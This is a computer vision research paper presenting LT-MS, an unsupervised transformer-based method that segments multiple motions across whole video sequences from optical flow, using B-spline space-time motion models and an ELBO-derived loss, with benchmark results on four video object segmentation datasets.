Human beings have the ability to continuously analyze a video and immediately extract its main motion components. Motion segmentation methods often proceed frame by frame. We want to go beyond this classical paradigm and perform the motion segmentation over a video sequence in one go. This will be a prominent added value for downstream computer vision tasks, and could provide a pretext criterion for unsupervised video representation learning. In this perspective, we propose a novel long-term spatio-temporal model operating in a totally unsupervised way. It takes as input the volume of consecutive optical flow (OF) fields, and delivers a volume of segments of coherent motion over the video. More specifically, we have designed a transformer-based network, where we leverage a mathematically well-founded framework, the Evidence Lower Bound (ELBO), to infer the loss function. The loss function combines a flow-reconstruction term, involving spatio-temporal parametric motion models that couple, in a novel way, polynomial (quadratic) motion models for the \((x, y)\) spatial dimensions with B-splines for the time dimension of the video sequence, and a regularization term enforcing temporal consistency on the masks. We report experiments on four VOS benchmarks with convincing quantitative results. We also highlight through visual results the key contributions to temporal consistency brought by our method.

1 INTRODUCTION

When dealing with videos, motion segmentation is one of the key issues. Human beings have the ability to continuously analyze a video and immediately extract the main motion components. Computer vision methods usually proceed frame by frame. We want to go beyond this classical paradigm and segment the different motion entities in a video sequence in one go. We thus thoroughly investigate the temporal dimension of the motion segmentation problem. Since the optical flow (OF) yields all the information on the movement between two images of the video sequence, it is natural to base motion segmentation on optical flow. Motion segmentation is a computer vision task in its own right, but it is also useful for diverse downstream tasks such as independent moving object detection, object tracking, or action recognition, to name a few. It is also leveraged in video object segmentation (VOS), though most often coupled with appearance. The optical flow field at time \(t\) enables one to get the segmentation at frame \(t\) of the video. However, taking a large time window, and even the whole video sequence, is beneficial, since motion entities are generally consistent throughout a video sequence (or at least within every video shot for long videos). Indeed, temporal coherence is inherent to motion. Therefore, it is essential that motion segmentation takes advantage of it, especially in a long-term perspective.

In this paper, we propose an original holistic method for multiple motion segmentation from optical flow over a video sequence. To the best of our knowledge, our optical flow segmentation (OFS) method is the first fully unsupervised network to involve long-term temporal consistency, and to segment multiple motions in a video sequence in one go. The main contributions of our work are as follows. Our network takes as input a volume of consecutive optical flows, and delivers consistent motion segmentation maps throughout the video sequence.
It involves a transformer module allowing for long-term interactions. It is trained in a completely unsupervised manner, without any manual annotation or ground truth data of any kind. The loss function is inferred by leveraging the Evidence Lower Bound (ELBO) framework, and comprises a flow-reconstruction term with original spatio-temporal parametric motion models and an additional term enforcing temporal consistency on the segmentation masks. We model with B-splines the long-term temporal evolution of the motion model parameters. Our method also involves a latent representation of the segment motion augmented with positional embedding.

The rest of the paper is organized as follows. Section 2 describes related work regarding motion segmentation. Section 3 presents our unsupervised network for multiple motion segmentation in one go, embedding long-term temporal consistency. In Section 4 we provide implementation details. Section 5 reports results on four VOS benchmarks with a comparison to state-of-the-art unsupervised motion segmentation methods. Finally, Section 6 contains concluding remarks.

2 RELATED WORK

Motion segmentation aims to break down each frame of a video sequence into components (or segments) of coherent motion. Usually, each motion segment is identified by a motion model, which can be hand-crafted, such as affine or quadratic polynomial models, or sometimes learned. Motion segmentation has been investigated for decades [19, 23, 38]. However, we will focus on recent methods in this section. Since accurate and efficient methods for estimating optical flow are now available, motion segmentation methods can leverage optical flow as a reliable input. The advent of deep learning methods in computer vision, and more recently the use of transformer-based networks with attention mechanisms [11], has also encompassed motion segmentation. In [35], a transformer module, more specifically the slot attention mechanism introduced in [18], is leveraged to perform motion segmentation from the optical flow. As a matter of fact, it addresses a binary segmentation problem, foreground moving object vs background. The loss function is composed of two terms, a flow-reconstruction term and an entropy term to make masks as binary as possible. Another approach is adopted in [34], which is able to cope with multiple motion segmentation. Nonlinear subspace filters are learned from stacked deep multi-layer perceptrons. Motion segmentation is then obtained at inference by applying K-means to the output embeddings. In [21], the Expectation-Maximization (EM) framework is leveraged to define the loss function and the training procedure for an unsupervised frame-by-frame motion segmentation, where 12-parameter quadratic motion models are involved. The same authors also proposed an extension of that method in [22] to better handle the temporal dimension of the problem, by considering triplets of flows as input. In [36], the authors developed an adversarial method whose aim is to generate a mask hiding the input optical flow, where an inpainter network attempts to recover the flow within the mask. The rationale is that no correct reconstruction of the inside flow can be achieved from the outside flow if the hidden area exhibits an independent motion and thus constitutes a motion segment. The temporal dimension of motion segmentation has been considered in various ways [30].
Regarding deep learning approaches, motion segmentation at time t is improved at training time in [35] by taking, as input, flows between t and several time instants before and after t. The authors of [8] consider several consecutive RGB frames as input of their self-supervised method. Optical flow is only computed at training time, and the loss function also comprises a temporal consistency term. However, the latter is not applied to two consecutive segmentation masks, but to pairings between the same frame t and another (more or less distant) one. In [9], spatio-temporal transformers were designed for video object segmentation involving temporal feature propagation.

VOS usually requires motion segmentation, often coupled with appearance [5, 10, 37]. It was addressed with supervised or semi-supervised methods as in [7, 9, 12], but also with unsupervised methods [36, 35, 21]. VOS is concerned with the segmentation of primary objects, i.e., objects moving in the foreground of a scene and possibly tracked by the camera [39]. Thus, VOS generally involves binary ground truth segregating the primary moving object from the background. This is for instance the case for the DAVIS2016 benchmark [26]. Recent works have revisited the way of coupling appearance and motion for VOS. The AMD method [17] includes two pathways, the appearance one and the motion one. While it does not use optical flow as input and brings out the objectness concept, it nevertheless relies on a coarse motion representation. The RCF method [16] involves learnable motion models, and is structured in two stages, a motion-supervised object discovery stage, and then a refinement stage with residual motion prediction and high-level appearance supervision. However, the method cannot distinguish objects undergoing different motions. In [6], the prediction of probable motion patterns is used at the training stage as a cue to learn objectness from videos. Divided attention is promoted in [14]. The resulting DivA method is based on the same principle as in [36], namely that motion segments are mutually uninformative. However, it is not limited to binary segmentation. It can segment a variable number of moving objects from optical flow, by leveraging a slot attention mechanism guided by the image content through a cross-modal conditional slot decoder.

Our fully unsupervised approach differs from these previous works in several respects. We rely only on optical flow and take a volume of OF fields as input, providing a volume of consistent segmentation maps. We introduce B-splines to define parametric motion models able to correctly handle motion evolution over time, and we express long-term temporal consistency. We infer the loss function from the Evidence Lower Bound (ELBO) framework. In [22], the authors also deal with temporal consistency. However, they only took a triplet of optical flow fields as input, they did not resort to transformers, and the temporal part of the motion model was just a linear (first-order polynomial) model in time. In addition, their temporal linkage of the consecutive motion segmentations over a video sequence was an ad hoc post-processing. In contrast, we define a fully integrated long-term model that is end-to-end trained in an unsupervised way. We will call our method the LT-MS method, for long-term motion segmentation, and in contrast, we will refer to the method of [22] as the ST-MS method, for short-term motion segmentation.
3 LONG-TERM MOTION SEGMENTATION METHOD

We have designed a transformer-based network for multiple motion segmentation from optical flow. It is inspired by the MaskFormer architecture [4], but it only comprises one head corresponding to the mask prediction, as described in Fig. 1. The network takes as input a volume, of flexible temporal length, comprising several consecutive optical flow fields. Temporal consistency is expressed in two main ways at the training stage. Firstly, we associate a space-time motion model with each segment to characterize its motion along with the evolution of the latter over time. Secondly, the loss function comprises an additional term enforcing consistent labeling of the motion segments over the volume.

Figure 1: Overall architecture of our multiple motion segmentation method ensuring temporal consistency with the loss term $L_c$ and the B-spline space-time motion models $\theta_k$ (for $k = 1, \ldots, K$). It takes as input a volume of $T$ flow fields. It comprises a 3D U-net ($e$ and $d$ boxes) and a transformer decoder ($t$ box). It also involves positional encoding. A cross-attention product yields the $K$ segmentation masks corresponding to the input volume. For the sake of clarity, the block diagram is represented for three motion segments ($K = 3$). $L_r$ is the flow-reconstruction loss term.

3.1 Spatio-temporal Parametric Motion Model

The set of $T$ consecutive flows will be designated as a space-time volume (or volume, for short). The volume could even be the whole video sequence. Our space-time motion model is estimated through B-spline functions [32]. We assign a spatio-temporal parametric motion model $\tilde{f}_{\theta_k}$ to each motion segment $k$, $k = 1, \ldots, K$; $\theta_k$ specifies the motion model for segment $k$. The motion model involves $J$ parameters, and each parameter $\theta_{kj}$, $j = 1, \ldots, J$, of the model results from a B-spline function of order $n$ in the variable $t$ over the space-time volume. In practice, we take $n = 3$. The number $L$ of control points is given by $L = 2 + \lfloor \frac{T-2}{\nu} \rfloor$, where $\nu$ allows us to set the temporal frequency of control points. We put a control point at both ends of the volume (at $t = 1$ and $t = T$), and the other control points are equidistantly placed in between. Most often, the control points are not located at time points of the video sequence. The space-time spline-based motion model is illustrated in Fig. 2. Just for this illustration, the motion models are computed within the two segments, foreground moving object and background, provided by the ground truth. The estimated motion model for the foreground moving object is able to capture the periodic nature of the swing motion, as demonstrated by the plots of the computed motion model parameters. Also, the motion model computed in the background segment perfectly fits the camera motion. Articulated motion (the woman's legs) would require multiple-motion segmentation.

Figure 2: Illustration of the spatio-temporal spline-based motion model. Top row: input flows displayed with the HSV code for the *swing* video of the DAVIS2016 dataset, binary segmentation ground truth, flows generated by the estimated spline-based motion models for the two segments. Bottom row: plot of the temporal evolution of the six estimated model parameters corresponding to the flow $u$-coordinate for the foreground moving object.
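Returning to the control-point placement described above, a small sketch (our own) of how the knot locations can be computed:

```python
import numpy as np

def control_points(T, nu):
    """L = 2 + floor((T - 2) / nu) control points: one at t = 1, one at
    t = T, the rest equidistant in between (in frame units)."""
    L = 2 + (T - 2) // nu
    return np.linspace(1, T, L)

print(control_points(T=9, nu=3))  # 4 control points: [1. 3.67 6.33 9.]
```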
Any parametric motion model could be considered. We use the 12-parameter quadratic motion model to be able to account for the continuously varying depth surface of the objects in the scene, especially for the whole background, and for complex object or camera motions. In contrast, the affine and the 8-parameter quadratic motion models assume a planar object surface. Indeed, the latter exactly corresponds to the projection in the image of the 3D rigid motion of a planar surface. For velocity fields, it is equivalent to the homography transform. However, in the presence of severe depth effects (strong depth discontinuities) and camera motion, the static scene cannot be represented by a single motion model, due to the motion parallax produced by static objects located in the foreground. Regarding first the spatial dimension of the motion model, the 2D flow vector yielded by the full quadratic motion model at point $(x, y)$ writes:
$$\tilde{f}_\theta(x, y) = (\theta_1 + \theta_2 x + \theta_3 y + \theta_7 x^2 + \theta_8 xy + \theta_9 y^2, \; \theta_4 + \theta_5 x + \theta_6 y + \theta_{10} x^2 + \theta_{11} xy + \theta_{12} y^2)^T.$$ (1)
To correctly handle complex temporal evolution, we resort to the spline approximation as aforementioned. By denoting now $S_n(\theta_k)$ the subscript of $\tilde{f}$, we emphasize that the motion model parameters for each segment $k$ are estimated through the B-spline functions. More specifically, we have:
$$\tilde{f}_{S_n(\theta_k)}(i, t) = \sum_{l=1}^{L} \tilde{f}_{\theta_{k,l}}(i, t) B_{n,l}(t),$$ (2)
where $B_{n,l}$ is the $l^{th}$ B-spline basis function of order $n$ (the spline order introduced in Section 3.1, with $n = 3$ in practice), $L$ is the number of control points, and $\theta_{k,l}$ collects the twelve quadratic-model parameters attached to the $l^{th}$ control point. In other words, the flow assigned to segment $k$ at time $t$ is a linear combination, with time-varying B-spline weights, of $L$ quadratic flow fields of the form (1).

### 3.2 Loss Function

We consider a volume of optical flow fields $f \in \mathbb{R}^{2 \times T \times W \times H}$, the spatial grid $\Omega \in \mathbb{R}^{W \times H}$ and $T$ temporal steps. We denote by $f(i, t) \in \mathbb{R}^2$ the flow associated to site $i \in \Omega$ at time $t$. We assume that we can decompose the flow into a set of $K$ segments, each one exhibiting a coherent motion. Flow vectors within a given segment $k$ are represented by a smooth parametric motion model parametrized by $\vartheta_k$. Variable $z_{i,t}$ conveys the motion segmentation, with $z_{i,t}^k = 1$ if site $(i, t)$ belongs to segment $k$. $z$ and $\vartheta = \{\vartheta_k, k = 1, \ldots, K\}$ are latent variables, and $f$ is the observed data. Following [13], we introduce an approximate distribution over segmentation and motion model parameters:
$$q(z, \vartheta | f) = q(z | f) q(\vartheta) = \left( \prod_{t=1}^{T} \prod_{i \in \Omega} \prod_{k=1}^{K} q(z_{i,t}^k | f) \right) \left( \prod_{k} q(\vartheta_k) \right),$$ (3)
where \( q(\vartheta_k) \triangleq \delta(\theta_k) \), with \( \delta \) the Dirac distribution, and \( q(z_{i,t}^k|f) = g_\phi(f)_{i,t}^k \), where \( g_\phi \) is our network model taking as input the optical flow volume and returning a probabilistic segmentation volume. We can also write the data log-likelihood over a dataset \( D \) of optical flow volumes \( f \) as:
\[
\log p(D) = \sum_{f \in D} \log p(f) = \sum_{f \in D} \left( \mathbb{E}_{q(z,\vartheta|f)}\left[\log \frac{p(f,z,\vartheta)}{q(z,\vartheta|f)}\right] + KL(q(z,\vartheta|f)\,||\,p(z,\vartheta|f)) \right) \geq \sum_{f \in D} \left( \mathbb{E}_{q(z,\vartheta|f)}[\log p(f|z,\vartheta)] - KL(q(z,\vartheta|f)\,||\,p(z,\vartheta)) \right),
\]
(4)
where we recognize the Evidence Lower Bound (ELBO).
Following the assumption stated above, we can write our likelihood as:
\[
p(f|z,\vartheta) = \prod_{t=1}^{T} \prod_{k=1}^{K} p(f(t)|\vartheta_k,z) \propto \prod_{t=1}^{T} \prod_{k=1}^{K} \prod_{i \in \Omega} \exp\left(-||f(i,t) - \tilde{f}_{S_n(\vartheta_k)}(i,t)||_1/\xi_{f,t}\right)^{z_{i,t}^k},
\]
(5)
where \( \tilde{f}_{S_n(\vartheta_k)}(i,t) \) is the flow vector given by the parametric motion model of parameters \( \vartheta_k \) at point \((i,t)\), as defined in Section 3.1 through the spline approximation, and \( \xi_{f,t} = \sum_i ||f(i,t)||_1 \) is a normalizing factor. From this likelihood, we can write the left term of the ELBO as:
\[
L_r = \mathbb{E}_{q(z,\vartheta|f)}[\log p(f|z,\vartheta)] = \sum_{t=1}^{T} \sum_{k} \mathbb{E}_q[\log p(f(t)|\vartheta_k,z)] = -\sum_{t=1}^{T} \sum_{i \in \Omega} \sum_{k} g_\phi(f)_{i,t}^k \, ||f(i,t) - \tilde{f}_{S_n(\vartheta_k)}(i,t)||_1/\xi_{f,t}.
\]
(6)
The term \( KL(q(z,\vartheta|f)\,||\,p(z,\vartheta)) \) allows us to define a prior over the segmentation. We want to enforce the property that the segmentation labels are temporally consistent, i.e., similar between neighbouring frames. We approximate this term using the temporal consistency loss defined in [22], as it showed good experimental results and is efficient to compute at training time:
\[
L_c = \frac{1}{2K|\Omega|} \sum_{i \in \Omega} \sum_{t=2}^{T} \mathbb{1}[\,||f_{i,t} - f_{i,t-1}||_1 < \lambda\,] \sum_{k=1}^{K} |g_\phi(f)_{i,t}^k - g_\phi(f)_{i,t-1}^k|,
\]
(7)
where the threshold \( \lambda \) allows us to discard occlusion areas. The loss function is thus defined by:
\[
\sum_{f \in D} L(f,\phi,\theta) = \sum_{f \in D} L_r(f,\phi,\theta) + \beta L_c(f,\phi).
\]
(8)
We set \( \beta = 1 \). The training procedure alternately updates \( \theta \) and \( \phi \), with \( \alpha \) as learning rate:
\[
\text{for } f \in D : \quad \theta^* = \arg \min_\theta L(f,\phi_t,\theta); \quad \phi_{t+1} = \phi_t - \alpha \nabla_\phi L(f,\phi_t,\theta^*).
\]
(9)

### 3.3 Network Architecture

The overall architecture of our unsupervised multiple motion segmentation framework is illustrated in Fig. 1. It includes two main modules. The first one, taking the flow volume as input, is a 3D U-net [29]. The latent code, augmented with positional embeddings, is directed to the transformer decoder. Then, by cross-attention, the output formed by the volume of segmentation masks is produced. The training of the overall architecture is based on the minimization of the loss function defined above, while the motion model parameters of the segments are given by the B-spline estimation. Temporal consistency is provided by the loss function and the space-time motion models.

### 4 Implementation

#### 4.1 Implementation Details

Following [6, 16, 21, 22, 35], we adopt the RAFT method [31] to compute the optical flow fields. More specifically, we use the RAFT version trained on the MPI Sintel dataset [2]. We downsample the computed flow fields to feed the network with $128 \times 224$ vector fields. The output segmentation maps are upsampled to the initial frame size for evaluation. Thus, we can perform efficient training and inference stages. We typically take flow volumes of temporal length $T = 9$ at training time. However, at test time, we can process flow volumes of larger temporal length, and even the flow volume of the whole sequence. To compute the spatio-temporal parametric motion models, the $x$ and $y$ coordinates are normalized within $[-1, 1]$, and a similar normalization is applied to the $t$ coordinate.
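As a concrete illustration of how such a normalized space-time model can be evaluated, here is a minimal sketch (our own, not the authors' implementation) of eqs. (1) and (2); the clamped knot construction and the scipy realization of the B-spline basis are our assumptions:

```python
import numpy as np
from scipy.interpolate import BSpline

def quadratic_flow(p, x, y):
    """Eq. (1): flow (u, v) of a 12-parameter quadratic model at points (x, y)."""
    u = p[0] + p[1]*x + p[2]*y + p[6]*x**2 + p[7]*x*y + p[8]*y**2
    v = p[3] + p[4]*x + p[5]*y + p[9]*x**2 + p[10]*x*y + p[11]*y**2
    return np.stack([u, v], axis=-1)

def spline_flow(theta, x, y, t, k=3):
    """Eq. (2): theta has shape (L, 12), one quadratic model per control
    point; degree-k B-spline weights blend the L quadratic flows at
    normalized time t in [-1, 1]."""
    L = theta.shape[0]
    inner = np.linspace(-1.0, 1.0, L - k + 1)
    knots = np.concatenate([[-1.0] * k, inner, [1.0] * k])
    weights = [BSpline(knots, np.eye(L)[l], k)(t) for l in range(L)]
    return sum(w * quadratic_flow(theta[l], x, y) for l, w in enumerate(weights))

# Usage on a toy grid: 4 control points (T = 9, nu = 3), random parameters.
x, y = np.meshgrid(np.linspace(-1, 1, 8), np.linspace(-1, 1, 8))
flow = spline_flow(np.random.randn(4, 12) * 0.1, x, y, t=0.25)
print(flow.shape)  # (8, 8, 2)
```

In the full method, the control-point parameters $\theta_{k,l}$ of each segment would be fitted by minimizing the flow-reconstruction term $L_r$.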
The full 12-parameter quadratic motion model is chosen in all the experiments, and we take $\nu = 3$ for the frequency factor in the B-spline approximation. We select for each site $i$ the segment $\hat{k}$ with the highest prediction. In eq. (7), we set $\lambda$ as the 99th quantile of the flow differences over the flow volume. Our LT-MS method is very efficient at test time. It runs on average at 210 fps on a GPU P100, that is, twice as fast as the ST-MS method [22]. This is largely due to the long flow sequence given as input to the network, which allows for parallelisation of some heavy computations. In addition, our LT-MS architecture remains lightweight, since it combines only three U-net layers and a transformer decoder on the downsampled feature space. Let us also stress that our LT-MS method does not involve any post-processing at all.

### 4.2 Data Augmentation and Network Training

We applied two types of data augmentation dedicated to optical flow. First, we add a global flow to the input flow, similarly as in the EM [21] and ST-MS [22] methods. However, in our case, the global flow is given by a full spline-based spatio-temporal motion model whose parameters are chosen at random. The same global flow is added to the flow fields of a given input volume. It allows us to mimic diverse camera motions, enforcing that the motion segments are independent of them. In addition, we corrupt a few flows out of the nine input ones. Thus, we simulate poorly estimated flow fields at some time instants, which the temporal consistency should overcome.

Our motion segmentation method is fully unsupervised. We never use any manual annotation. We train our model only on the FlyingThings3D (FT3D) dataset [20], whatever the dataset considered at test time. This ensures that our LT-MS network generalizes well to unseen datasets. Regarding hyperparameter setting, we select the stopping epoch from the loss function evaluated on the DAVIS2016 training set. Additional information on the optimization stage is given in the Appendix.

## 5 EXPERIMENTAL RESULTS

We have carried out comparative experiments on four datasets: DAVIS2016[^1], SegTrackV2[^2], FBMS59 [24], and DAVIS2017-motion [33]. More information on the datasets is provided in the Appendix.

### 5.1 Ablation Study

We have conducted an ablation study to assess three main components of our method LT-MS with four masks ($K = 4$), in particular related to the temporal dimension of the problem. We changed one component at a time, as specified hereafter: we use the polynomial space-time quadratic motion model of ST-MS [22] instead of the space-time motion model based on B-splines over the input sequence; we omit the consistency term $L_c$ in the loss function; we just take the convnet without the transformer decoder. All the ablation experiments were run on the three datasets DAVIS2016, FBMS59 and SegTrackV2. Results are collected in Table 1. In addition, we performed them for two input-sequence configurations, respectively input sequences of ten flows and input sequences of 120 flows (in practice, the whole video for the DAVIS2016 dataset). We can observe that the three ablations have almost the same impact on the performance. The three corresponding model components, i.e., the spline-based motion model, the temporal-consistency loss term, and the transformer decoder, are thus all beneficial in similar proportions.
They are able to handle the temporal dimension of the problem and the temporal motion evolution along the sequence in a compelling way. Admittedly, the contributions of these three components are more significant for the FBMS59 and SegTrackV2 datasets.

[^1]: https://davischallenge.org/index.html
[^2]: https://paperswithcode.com/dataset/segtrack-v2-1

Table 1: Ablation study for three main components of our method LT-MS ($K = 4$) on DAVIS2016, FBMS59 and SegTrackV2. Only one model component is modified at a time. The performance scores are given by the Jaccard index $J$. We report ablation results with two input-flow sequence lengths (or cut sizes), respectively obtained by dividing the video into pieces of ten successive frames or by considering 120 successive frames (in practice, the whole video for DAVIS2016).

| Ablation / Dataset | DAVIS2016 | | FBMS59 | | SegTrackV2 | |
|-----------------------------|------|------|------|------|------|------|
| Cut Size | 10 | 120 | 10 | 120 | 10 | 120 |
| Full Model LT-MS-K4 | 74.8 | 72.4 | 61.0 | 58.2 | 61.3 | 60.4 |
| Unet3D only | 73.0 | 71.3 | 56.6 | 55.5 | 58.2 | 57.3 |
| No consistency term $L_c$ | 73.5 | 71.0 | 57.5 | 55.5 | 58.0 | 57.5 |
| Polynomial space-time quadratic model | 73.4 | 69.8 | 57.4 | 54.5 | 57.8 | 56.6 |

However, the dynamic content of the majority of the DAVIS2016 videos, and hence the overall performance score, cannot allow us to fully appreciate the contributions of these three model components. Yet, they can be acknowledged by visualizing results obtained on some videos of DAVIS2016, as shown in the Appendix.

### 5.2 Quantitative and Comparative Evaluation

We report in Table 2 the results obtained by two versions of our LT-MS method on the three datasets DAVIS2016, SegTrackV2, and FBMS59. LT-MS-K2 performs segmentation with only two masks ($K = 2$), while LT-MS-K4 involves four masks ($K = 4$). Table 2 collects results obtained by our LT-MS method and other existing unsupervised methods, when available. We follow the categorization proposed in [21] regarding input and training. However, we have added a category w.r.t. the network input for four recent methods [6, 8, 16, 17] that only use RGB images as input at test time, the optical flow being only involved in the loss function. Evaluation is performed on the binary ground truth (foreground moving object vs background) for the three datasets. In the Appendix, we explain how we select the segments for the binary evaluation from the multiple motion segments delivered by our LT-MS method. We still put the OCLR method [33] in the category of unsupervised methods, whereas the authors of the DivA method [14] did not. Indeed, OCLR is not fully unsupervised, since it relies on human-annotated sprites to include realistic shapes in the computer-generated data used at training time. We consider the OCLR version taking only optical flow as input. The post-processing added to the CIS method [36], based on Conditional Random Fields (CRF), is a heavy one, which leads most authors to retain only the version without post-processing for a fair comparison. As shown in Table 2, our LT-MS method provides very convincing results, both for LT-MS-K2 and LT-MS-K4, in the category of unsupervised methods based on optical flow only. OCLR and DivA demonstrate better performance on the SegTrackV2 dataset. However, as aforementioned, OCLR is not a fully unsupervised method, while DivA leverages RGB images in its conditional decoder.
In addition, DivA, along with the MoSeg and CIS methods, takes multi-step flows as input, between $t$ and, in turn, $t+1$, $t+2$, $t-1$, $t-2$, and averages the four corresponding predictions to get the final result. SegTrackV2 includes sequences acquired with a poorly controlled handheld camera, which leads to unstable sequences where the contribution of our method is less likely to be emphasized. Overall, temporal consistency is properly handled over long temporal periods by our LT-MS method. Beyond segmentation performance, we want to stress that our method is the only one providing by design a coherent segmentation over the sequence, which is a significant added value. Thus, we can claim that we have not only segmented the moving objects throughout the sequence, but also achieved some kind of tracking.

### 5.3 Multi-segment Evaluation

We have also performed the evaluation of multiple motion segmentation in a multi-segment setting. Since multiple-motion segmentation is harder than binary motion segmentation (moving foreground vs background), accuracy scores are expected to decrease for all methods. In Table 3, we report comparative results on the DAVIS2017-motion dataset and on FBMS59. As for the other methods, we performed segmentation with three masks. To this end, we finetuned the LT-MS-K4 network on the DAVIS2016 training set with now three masks ($K = 3$).

Table 2: Results obtained with two versions of our LT-MS method on DAVIS2016, SegTrackV2, FBMS59. LT-MS-K2 performs segmentation with two masks ($K = 2$), and LT-MS-K4 involves four masks ($K = 4$). We include comparison with unsupervised methods (scores from the cited articles). All scores correspond to evaluation on the binary ground truth. For LT-MS-K4 and LT-MS-K2, we report results obtained with a cut size of 10. Results with a cut size of 120 are given for LT-MS-K4 in Table 1, with very close performance (additional results on this point in the Appendix). The Jaccard index $J$ is the intersection over union between the extracted segments and the ground truth, while $F$ focuses on segment boundary accuracy. Performance is assessed by the average score over all samples for all datasets but DAVIS2016. For the latter, the overall score is given by the average of sequence scores. *Actually, putting OCLR as an unsupervised method can be questioned (see main text). †DivA somehow uses RGB input, since its conditional decoder leverages input images.

| Method | Training | Input | DAVIS2016 | SegTrackV2 | FBMS59 |
|-----------------|--------------|-------------|-----------|-------------|--------|
| **Ours LT-MS-K4** | Unsupervised | Flow | 74.8 | 72.2 | 61.3 |
| **Ours LT-MS-K2** | | | 70.3 | 68.5 | 58.6 |
| ST-MS (4 masks) [22] | | | 73.2 | 70.3 | 55.0 |
| EM [21] | | | 69.3 | 70.7 | 55.5 |
| MoSeg [35] | | | 68.3 | 66.1 | 58.6 |
| FTS [25] | | | 55.8 | - | 47.8 |
| TIS$_0$ [10] | | | 56.2 | 45.6 | - |
| OCLR* [33] (flow only) | | | 72.1 | - | 67.6 |
| GWM [6] | | RGB (Flow in loss) | 79.5 | - | 78.3 |
| RCF [16] | | | 80.9 | - | 76.7 |
| AMD [17] | | | 57.8 | - | 57.0 |
| MOD [8] | | | 73.9 | - | 62.2 |
| DivA(4)† [14] | | RGB & Flow | 72.4 | - | 64.6 |
| TIS$_s$ [10] | | | 62.6 | 59.6 | - |
| CIS - No Post [36] | | | 59.2 | - | 45.6 |
| CIS - With Post [36] | | | 71.5 | - | 62.0 |

Table 3: Multi-segment evaluation. Regarding DAVIS2017-motion, $J \& F$ is the mean of the two. Evaluation is performed on the video as a whole according to the official DAVIS2017 scheme. Reported scores are the average of the individual video scores. *See caption of Table 2.
5.4 Qualitative Visual Evaluation

Fig. 3 contains several visual results demonstrating how our LT-MS method behaves in different situations. We display three result samples obtained on different videos of the benchmarks; additional results are provided in the Appendix.

Figure 3: Results obtained with our LT-MS-K4 method ($K = 4$). Three groups of results are displayed: motocross-jump from DAVIS2016, people02 from FBMS59 and bmx from SegTrackV2. For each group, the first row samples successive flow fields (HSV color code) corresponding to the processed video. The second row contains the corresponding images of the video, where the ground truth of the moving object is overlaid in yellow (when available at that frame). The third row shows the motion segments provided by our LT-MS-K4 method, with one colour per segment. For all the results, we adopt the same colour set for the three masks corresponding to the moving objects (blue, red and orange), and we leave the background image for the background mask.

We can observe that the motion segments are globally accurate. Since our method involves several masks, we can properly handle articulated motions (people02, bmx), deal with the presence of several moving objects in the scene (people02), separate the rider from the bike or motorbike (bmx, motocross-jump), and accommodate motion parallax. Since our method enforces temporal consistency, it can also deal with errors in optical flow estimation or with objects that momentarily stop moving (bmx). We must keep in mind that our actual target is the optical-flow segmentation (OFS) task, even if we evaluate our method on VOS benchmarks. Since VOS benchmarks deal with the segmentation of one primary object moving in the foreground, discrepancies with OFS may occur, which negatively impacts the evaluation scores. The segmentation of additional parts, which appears wrong w.r.t. the VOS ground truth, on the contrary makes sense from the OFS standpoint.

6 CONCLUSION

We have designed an original transformer-based unsupervised method for segmenting multiple motions over a video in one go. Our LT-MS method leverages the ELBO framework for the loss function and fully acknowledges the temporal dimension of the motion segmentation problem.
Indeed, to the best of our knowledge, our method is the first unsupervised network-based OFS method explicitly yielding a stable and consistent optical-flow segmentation throughout long video sequences. At training time, it introduces, on the one hand, B-spline spatio-temporal parametric motion models over space-time volumes and, on the other hand, a loss term expressing temporal consistency over successive masks while taking care of occlusions. Our transformer-based network can be applied at test time to input volumes of any temporal length, and it can accommodate different choices of the number $K$ of masks with a simple finetuning step. Experimental results demonstrate the efficiency and accuracy of our LT-MS method, which provides competitive results on several datasets while being very fast at test time. In future work, we will investigate the slot attention mechanism to modify the number of masks at test time without retraining the model.

REFERENCES

[1] G.K. Batchelor. *An introduction to fluid dynamics*. Cambridge University Press, 1967.

[2] D.J. Butler, J. Wulff, G.B. Stanley, and M.J. Black. A naturalistic open source movie for optical flow evaluation. In *European Conference on Computer Vision (ECCV)*, 2012.

[3] M. Caron, H. Touvron, I. Misra, H. Jégou, J. Mairal, P. Bojanowski, and A. Joulin. Emerging properties in self-supervised vision transformers. In *International Conference on Computer Vision (ICCV)*, October 2021.

[4] B. Cheng, A. G. Schwing, and A. Kirillov. Per-pixel classification is not all you need for semantic segmentation. In *Conference on Neural Information Processing Systems (NeurIPS)*, 2021.

[5] J. Cheng, Y.-H. Tsai, S. Wang, and M.-H. Yang. Segflow: Joint learning for video object segmentation and optical flow. In *International Conference on Computer Vision (ICCV)*, Venice, 2017.

[6] S. Choudhury, L. Karazija, I. Laina, A. Vedaldi, and C. Rupprecht. Guess what moves: Unsupervised video and image segmentation by anticipating motion. In *British Machine Vision Conference (BMVC)*, London, 2022.

[7] A. Dave, P. Tokmakov, and D. Ramanan. Towards segmenting anything that moves. In *Int. Conference on Computer Vision Workshops (ICCVW)*, Seoul, 2019.

[8] S. Ding, W. Xie, Y. Chen, R. Qian, X. Zhang, H. Xiong, and Q. Tian. Motion-inductive self-supervised object discovery in videos. *arXiv:2210.00221*, October 2022.

[9] B. Duke, A. Ahmed, C. Wolf, P. Aarabi, and G. W. Taylor. SSTVOS: Sparse spatiotemporal transformers for video object segmentation. In *Conference on Computer Vision and Pattern Recognition (CVPR)*, 2021.

[10] B. Griffin and J. Corso. Tukey-inspired video object segmentation. In *IEEE Winter Conference on Applications of Computer Vision (WACV)*, Waikoloa Village, January 2019.

[11] K. Han, Y. Wang, H. Chen, X. Chen, J. Guo, Z. Liu, Y. Tang, A. Xiao, C. Xu, Y. Xu, Z. Yang, Y. Zhang, and D. Tao. A survey on vision transformer. *IEEE Transactions on Pattern Analysis and Machine Intelligence*, 45(1):87-110, January 2023.

[12] S.D. Jain, B. Xiong, and K. Grauman. FusionSeg: Learning to combine motion and appearance for fully automatic segmentation of generic objects in videos. In *Conference on Computer Vision and Pattern Recognition (CVPR)*, Honolulu, 2017.

[13] D.P. Kingma and M. Welling. An introduction to variational autoencoders. *Foundations and Trends in Machine Learning*, 12(4):307-392, 2019.

[14] D. Lao, Z. Hu, F. Locatello, Y. Yang, and S. Soatto. Divided attention: Unsupervised multi-object discovery with contextually separated slots.
*arXiv:2304.01430*, April 2023.

[15] F. Li, T. Kim, A. Humayun, D. Tsai, and J. M. Rehg. Video segmentation by tracking many figure-ground segments. In *International Conference on Computer Vision (ICCV)*, Sydney, 2013.

[16] L. Lian, Z. Wu, and S. X. Yu. Bootstrapping objectness from videos by relaxed common fate and visual grouping. In *Conference on Computer Vision and Pattern Recognition (CVPR)*, Vancouver, June 2023.

